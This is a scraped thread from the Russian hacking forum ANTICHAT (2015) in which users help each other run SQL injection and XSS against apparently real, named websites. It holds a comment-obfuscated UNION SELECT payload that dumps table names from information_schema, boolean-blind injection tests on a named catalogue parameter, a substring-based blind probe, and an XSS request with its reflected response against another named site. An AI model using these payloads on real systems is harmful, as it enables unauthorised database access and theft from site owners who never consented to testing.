ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.10.2015, 20:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от yarbabin
yarbabin said:
↑
а blind работает и без procedure analyse а как составить вектор для blind работает и без procedure analyse?
|
|
|
|
27.10.2015, 23:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от yarbabin
yarbabin said:
↑
хотя я забыл еще уточнить, в запросе есть order by? да есть я писал об етом
Сообщение от yarbabin
yarbabin said:
↑
а blind, как обычно, and substring(version(),1,1)=5 после лимита "and" как это?
|
|
|
|
28.10.2015, 00:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
7285
Репутация:
0
|
|
Хелп.
Тема такая, не могу вывести данные.
Код:
Code:
http://www.twinsspecial.com/product-detail.php?id=-70' /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,/*!unhex(hex(group_concat(table_name)))*/,26,27,28,29 from {f information_schema.tables} --+ or ''='
в schema_name есть twinsspe_twins, но не выводится из неё инфа.
скорей всего нету там просто ничего. |
|
|
|
28.10.2015, 09:35
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от ButilkaSoka
ButilkaSoka said:
↑
Хелп.
Тема такая, не могу вывести данные.
Код:
Code:
http://www.twinsspecial.com/product-detail.php?id=-70' /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,/*!unhex(hex(group_concat(table_name)))*/,26,27,28,29 from {f information_schema.tables} --+ or ''='
в schema_name есть twinsspe_twins, но не выводится из неё инфа.
скорей всего нету там просто ничего. Ты работаешь под этой БД. В твоем запросе как раз и выводятся таблицы из этой БД.
|
|
|
29.10.2015, 00:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
290
Репутация:
0
|
|
|
|
|
|
29.10.2015, 10:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
Зачем вы кавычку вконце поставили я вообще не пойму.
Unknown column 'root' in 'where clause'
Обычная ошибка бд, никакой sql inj
|
|
|
|
31.10.2015, 01:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
11341
Репутация:
0
|
|
Сообщение от vikler
vikler said:
↑
Ребят, по сайту. Что дальше делать, кто-нибудь может показать пример для вывода чего-нибудь из information schema к примеру? sqlmap не может ничего вывести,хотя boolean уязвимость явно есть. Придётся вручную.. просто натолкните на верный путь плиз)
Сабж:
Код:
Code:
http://indigital{GOOGLEINDEX}images.com/indigital/{GOOGLEINDEX}ecommerce/catalogo.do?tab_07=1800&tab_06=2619+and+1=1&tab_09=1343&tab_04=1348
И где там уязвимость?*
|
|
|
|
31.10.2015, 01:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
36068
Репутация:
0
|
|
Сообщение от xivi00
xivi00 said:
↑
И где там уязвимость?* ну как бы, tab_06
tab_06=2619+and+1=1 [true=>корректрый вывод]
tab_06=2619+and+1=2 [false=>пустой вывод]
|
|
|
|
31.10.2015, 01:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
11341
Репутация:
0
|
|
Сообщение от vikler
vikler said:
↑
ну как бы, tab_06
tab_06=2619+and+1=1 [true=>корректрый вывод]
tab_06=2619+and+1=2 [false=>пустой вывод] Извеняюсь протупил
|
|
|
|
01.11.2015, 18:09
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от SaNDER
SaNDER said:
↑
Хорошо другой вопрос ssh-shop.in/captcha/?route=captcha">prompt(947944)
Код:
Code:
GET /captcha/?route=captcha">prompt(947944) HTTP/1.1
Host: ssh-shop.in
Код:
Code:
HTTP/1.1 200 OK
...
prompt(947944)">
prompt(947944)">
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
